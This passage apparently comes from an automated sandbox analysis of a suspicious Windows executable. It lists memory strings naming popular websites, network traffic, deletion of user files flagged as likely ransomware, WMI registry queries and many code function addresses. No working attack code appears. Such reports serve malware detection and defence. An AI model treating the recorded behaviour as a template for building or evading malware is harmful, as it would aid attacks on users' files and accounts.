              Source: e45AiBoV6X.exe, 00000001.00000002.1987767316.000002290B3D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_c
              Source: e45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: e45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: e45AiBoV6X.exe, 00000001.00000002.1988820175.000002290BF48000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982362710.000002290B8E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp, e45AiBoV6X.exe, 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: e45AiBoV6X.exe, 00000000.00000003.1717679887.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1736201846.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737797560.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1736689465.000002290AA40000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737369965.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1725631506.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
              Source: e45AiBoV6X.exe, 00000001.00000002.1985753646.000002290AAD0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Modifies existing user documents (likely ransomware behavior)
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ?? \Common Files\Desktop\RAYHIWGKDI.mp3Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ?? \Common Files\Desktop\DVWHKMNFNN.docxJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ?? \Common Files\Desktop\DVWHKMNFNN.docxJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ?? \Common Files\Desktop\NIKHQAIQAU.pngJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ?? \Common Files\Desktop\NIKHQAIQAU.pngJump to behavior
              Source: cmd.exeProcess created: 46

              System Summary

              barindex
              Very long command line found
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Writes or reads registry keys via WMI
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B13A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,65_2_00007FF629B13A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,65_2_00007FF629B3B57C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB205C740_2_00007FF6FB205C74
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E10000_2_00007FF6FB1E1000
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F0C640_2_00007FF6FB1F0C64
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F14840_2_00007FF6FB1F1484
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F2CC40_2_00007FF6FB1F2CC4
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB200B840_2_00007FF6FB200B84
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1FFBD80_2_00007FF6FB1FFBD8
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F73F40_2_00007FF6FB1F73F4
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB2033BC0_2_00007FF6FB2033BC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F0A600_2_00007FF6FB1F0A60
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB208A380_2_00007FF6FB208A38
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F7AAC0_2_00007FF6FB1F7AAC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F12800_2_00007FF6FB1F1280
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E8B200_2_00007FF6FB1E8B20
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F91B00_2_00007FF6FB1F91B0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB20518C0_2_00007FF6FB20518C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1FD2000_2_00007FF6FB1FD200
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F10740_2_00007FF6FB1F1074
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F50400_2_00007FF6FB1F5040
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1FD8800_2_00007FF6FB1FD880
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F28C00_2_00007FF6FB1F28C0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E979B0_2_00007FF6FB1E979B
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E9FCD0_2_00007FF6FB1E9FCD
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F0E700_2_00007FF6FB1F0E70
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB202F200_2_00007FF6FB202F20
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F1F300_2_00007FF6FB1F1F30
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1FFBD80_2_00007FF6FB1FFBD8
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB2057280_2_00007FF6FB205728
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB204F100_2_00007FF6FB204F10
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1FCD6C0_2_00007FF6FB1FCD6C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E95FB0_2_00007FF6FB1E95FB
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB205C741_2_00007FF6FB205C74
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E10001_2_00007FF6FB1E1000
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E95FB1_2_00007FF6FB1E95FB
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F0C641_2_00007FF6FB1F0C64
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F14841_2_00007FF6FB1F1484
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F2CC41_2_00007FF6FB1F2CC4
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB200B841_2_00007FF6FB200B84
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1FFBD81_2_00007FF6FB1FFBD8
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F73F41_2_00007FF6FB1F73F4
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB2033BC1_2_00007FF6FB2033BC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F0A601_2_00007FF6FB1F0A60
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB208A381_2_00007FF6FB208A38
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F7AAC1_2_00007FF6FB1F7AAC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F12801_2_00007FF6FB1F1280
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E8B201_2_00007FF6FB1E8B20
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F91B01_2_00007FF6FB1F91B0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB20518C1_2_00007FF6FB20518C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1FD2001_2_00007FF6FB1FD200
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F10741_2_00007FF6FB1F1074
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F50401_2_00007FF6FB1F5040
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1FD8801_2_00007FF6FB1FD880
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F28C01_2_00007FF6FB1F28C0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E979B1_2_00007FF6FB1E979B
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E9FCD1_2_00007FF6FB1E9FCD
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F0E701_2_00007FF6FB1F0E70
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB202F201_2_00007FF6FB202F20
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F1F301_2_00007FF6FB1F1F30
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1FFBD81_2_00007FF6FB1FFBD8
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB2057281_2_00007FF6FB205728
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB204F101_2_00007FF6FB204F10
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1FCD6C1_2_00007FF6FB1FCD6C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE12F01_2_00007FFDFAEE12F0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE18D01_2_00007FFDFAEE18D0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB3544601_2_00007FFDFB354460
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1A3B801_2_00007FFDFB1A3B80
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1B7BC01_2_00007FFDFB1B7BC0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB006A871_2_00007FFDFB006A87
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00655F1_2_00007FFDFB00655F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0060A01_2_00007FFDFB0060A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB06FA001_2_00007FFDFB06FA00
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0041651_2_00007FFDFB004165
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB003FDA1_2_00007FFDFB003FDA
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0022E81_2_00007FFDFB0022E8
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0021B71_2_00007FFDFB0021B7
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0027661_2_00007FFDFB002766
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1300101_2_00007FFDFB130010
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0032E71_2_00007FFDFB0032E7
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB01BF201_2_00007FFDFB01BF20
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0022891_2_00007FFDFB002289
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB01BD601_2_00007FFDFB01BD60
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB137CD01_2_00007FFDFB137CD0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0030C11_2_00007FFDFB0030C1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB006EF11_2_00007FFDFB006EF1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005D8A1_2_00007FFDFB005D8A
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0029CD1_2_00007FFDFB0029CD
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB006CBC1_2_00007FFDFB006CBC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00114F1_2_00007FFDFB00114F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB13B2001_2_00007FFDFB13B200
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB01F2001_2_00007FFDFB01F200
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00213F1_2_00007FFDFB00213F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB01F0601_2_00007FFDFB01F060
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00704A1_2_00007FFDFB00704A
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB23F7D01_2_00007FFDFB23F7D0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB001EA11_2_00007FFDFB001EA1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB006F281_2_00007FFDFB006F28
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB02B8501_2_00007FFDFB02B850
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB02B4C01_2_00007FFDFB02B4C0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB003B931_2_00007FFDFB003B93
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1374F01_2_00007FFDFB1374F0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0051691_2_00007FFDFB005169
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1A2C401_2_00007FFDFB1A2C40
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0060DC1_2_00007FFDFB0060DC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB004E4E1_2_00007FFDFB004E4E
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005E251_2_00007FFDFB005E25
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB18E8701_2_00007FFDFB18E870
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0023F11_2_00007FFDFB0023F1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0046331_2_00007FFDFB004633
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0072C51_2_00007FFDFB0072C5
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0E2EB01_2_00007FFDFB0E2EB0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB01EF001_2_00007FFDFB01EF00
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB001B221_2_00007FFDFB001B22
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB004D041_2_00007FFDFB004D04
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005DA31_2_00007FFDFB005DA3
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005B0F1_2_00007FFDFB005B0F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0034861_2_00007FFDFB003486
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1363101_2_00007FFDFB136310
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0057D11_2_00007FFDFB0057D1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0047461_2_00007FFDFB004746
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00378D1_2_00007FFDFB00378D
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0043591_2_00007FFDFB004359
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB001B311_2_00007FFDFB001B31
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB006FFF1_2_00007FFDFB006FFF
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB001CC11_2_00007FFDFB001CC1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1328501_2_00007FFDFB132850
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB001A4B1_2_00007FFDFB001A4B
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005A601_2_00007FFDFB005A60
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00707C1_2_00007FFDFB00707C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0036931_2_00007FFDFB003693
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1B9B901_2_00007FFDFB1B9B90
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0050AB1_2_00007FFDFB0050AB
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0035FD1_2_00007FFDFB0035FD
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1A1AD01_2_00007FFDFB1A1AD0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0059F71_2_00007FFDFB0059F7
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB004F3E1_2_00007FFDFB004F3E
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00638E1_2_00007FFDFB00638E
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0021351_2_00007FFDFB002135
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0053C11_2_00007FFDFB0053C1
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB004AC51_2_00007FFDFB004AC5
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0054CF1_2_00007FFDFB0054CF
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00216C1_2_00007FFDFB00216C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1360101_2_00007FFDFB136010
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0072AC1_2_00007FFDFB0072AC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0016221_2_00007FFDFB001622
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB002D0B1_2_00007FFDFB002D0B
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB003BA21_2_00007FFDFB003BA2
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00736A1_2_00007FFDFB00736A
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB001D831_2_00007FFDFB001D83
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0072571_2_00007FFDFB007257
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0029821_2_00007FFDFB002982
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB001CFD1_2_00007FFDFB001CFD
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00266C1_2_00007FFDFB00266C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0038321_2_00007FFDFB003832
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB003A851_2_00007FFDFB003A85
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1B93C01_2_00007FFDFB1B93C0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00710D1_2_00007FFDFB00710D
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0053A81_2_00007FFDFB0053A8
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB01D2601_2_00007FFDFB01D260
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0068CA1_2_00007FFDFB0068CA
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1411701_2_00007FFDFB141170
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB12D1701_2_00007FFDFB12D170
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0252001_2_00007FFDFB025200
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00144C1_2_00007FFDFB00144C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0031891_2_00007FFDFB003189
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB001F961_2_00007FFDFB001F96
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00542F1_2_00007FFDFB00542F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0065641_2_00007FFDFB006564
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1417A01_2_00007FFDFB1417A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0012991_2_00007FFDFB001299
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0055101_2_00007FFDFB005510
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB003A8F1_2_00007FFDFB003A8F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0054CA1_2_00007FFDFB0054CA
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0015C81_2_00007FFDFB0015C8
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0042871_2_00007FFDFB004287
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0050471_2_00007FFDFB005047
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0044C61_2_00007FFDFB0044C6
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005BF01_2_00007FFDFB005BF0
